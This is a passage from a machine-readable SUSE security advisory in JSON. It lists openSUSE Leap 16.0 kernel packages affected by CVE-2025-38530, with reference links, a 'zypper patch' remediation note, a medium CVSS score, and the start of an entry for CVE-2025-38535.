"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38530",
"url": "https://www.suse.com/security/cve/CVE-2025-38530"
},
{
"category": "external",
"summary": "SUSE Bug 1248206 for CVE-2025-38530",
"url": "https://bugzilla.suse.com/1248206"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38530"
},
{
"cve": "CVE-2025-38535",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38535"
}
],
"notes": [
{
"category": "general",
